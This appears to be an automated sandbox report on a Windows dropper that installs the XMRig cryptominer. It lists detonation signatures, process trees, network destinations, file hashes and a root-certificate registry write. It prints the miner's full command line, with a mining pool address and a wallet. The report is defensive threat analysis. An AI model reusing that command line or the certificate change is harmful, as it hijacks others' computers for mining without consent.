| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3436 wrote to memory of 4224 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3436 wrote to memory of 4224 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 88.221.83.234:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.83.221.88.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4224-14-0x000001506F6A0000-0x000001506F6C0000-memory.dmp
memory/4224-15-0x0000015070FA0000-0x0000015070FC0000-memory.dmp
memory/4224-16-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-18-0x0000015070FE0000-0x0000015071000000-memory.dmp
memory/4224-17-0x0000015070FC0000-0x0000015070FE0000-memory.dmp
memory/4224-19-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-20-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-21-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-22-0x0000015070FC0000-0x0000015070FE0000-memory.dmp
memory/4224-23-0x0000015070FE0000-0x0000015071000000-memory.dmp
memory/4224-24-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-25-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-26-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-27-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-28-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-29-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-30-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-31-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-32-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-33-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-34-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-35-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-36-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-37-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-38-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-39-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-40-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-41-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-42-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-43-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-44-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-45-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-46-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-47-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-48-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-49-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-50-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-51-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-52-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-53-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-54-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-55-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-56-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-57-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-58-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-59-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-60-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-61-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-62-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-63-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-64-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-65-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-66-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-67-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-68-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-69-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-70-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-71-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-72-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-73-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-74-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-75-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-76-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-77-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-78-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-79-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-80-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-81-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
memory/4224-82-0x00007FF6E1D10000-0x00007FF6E2813000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:18
Platform
win10v2004-20240508-en
Max time kernel
1596s
Max time network
1608s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| IE | 52.111.236.23:443 | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:18
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1472 wrote to memory of 2700 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1472 wrote to memory of 2700 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
